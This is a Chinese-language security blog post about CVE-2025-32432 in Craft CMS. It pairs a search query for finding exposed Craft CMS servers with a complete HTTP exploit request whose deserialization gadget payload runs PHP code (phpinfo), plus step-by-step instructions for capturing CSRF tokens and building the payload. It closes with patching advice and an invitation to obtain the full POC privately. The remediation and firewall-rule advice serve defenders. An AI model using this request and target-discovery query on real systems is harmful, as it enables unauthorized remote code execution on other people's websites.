免责声明!
本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法
。
大 纲
0x01 漏洞概述
0x02 影响范围
0x03 资产测绘
0x04 漏洞利用及复现过程
0x05 修复方案
0x01 漏洞概述
Craft CMS是一个开源的内容管理系统,它专注于用户友好的内容创建过程,逻辑清晰明了,是一个高度自由,高度自定义设计的平台吗,可以用来创建个人或企业网站也可以搭建企业级电子商务系统。
0x02 影响范围
0x03 资产测绘
header="X-Powered-By: Craft CMS" || banner="X-Powered-By: Craft CMS"
0x04 漏洞利用及复现过程
POST / index.php?p=admin/actions/assets/generate-transform HTTP/1.1
Host: xxx.xxx.xxx.xxx
Cookie: CRAFT_CSRF_TOKEN=daf6b64e2d0beca2810a1f2ba142ace3635bff363e262e10ebaa4e82b0fe9a4aa%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A40%3A%22jvyEd4GLStsd2iruHCZ_pgYXRkKWNLFc3_aWQX1q%22%3B%7D
Content-Type: application/json
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Csrf-Token: bzFvT_mLmqlXm01ioxrWVQ3upJAehcZVaB5aNy52BVwY0mEZ_owjMwVHFgqdv93lBO8-BpFzpCBFrf7PbuKfDTp1EWBgOkM_K40ATq_UEkI=
Content-Length: 217
{"assetId":11,"handle":{"width":123,"height":123,"as session":{"class":"craft\\behaviors\\FieldLayoutBehavior","__class":"GuzzleHttp\\Psr7\\FnStream","__construct()":[[]],"_fn_close":"phpinfo"}},"9qsccmw8lve":"="}
S1:抓取
xxx.xxx.xxx.xxx/
index.php?p=admin/actions/assets/generate-transform数据包:
S2:获取CRAFT_CSRF_TOKEN:
S3:获取X-Csrf-Token:
S4:构造payload:
{"assetId":11,"handle":{"width":123,"height":123,"as session":{"class":"craft\\behaviors\\FieldLayoutBehavior","__class":"GuzzleHttp\\Psr7\\FnStream","__construct()":[[]],"_fn_close":"phpinfo"}},"9qsccmw8lve":"="}
0x05 修复建议
-
重置安全密钥(php craft setup/security-key)。
-
轮换数据库凭证及API密钥,强制所有用户修改密码。
-
在防火墙拦截包含“__class”的POST请求。
-
安装官方临时补丁库“Craft CMS Security Patches”。 - 立即升级,安装官方安全版本(3.9.15、4.14.15、5.6.17)。
CVE-2025-32432是2025年迄今影响最广泛的CMS漏洞之一,其低攻击门槛与高危害性已引发全球安全团队高度警戒。Craft CMS用户需立即行动,避免成为下一批受害者。
关注并私信进社群获取POC!
没看够~?欢迎关注!
往期精彩推荐
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论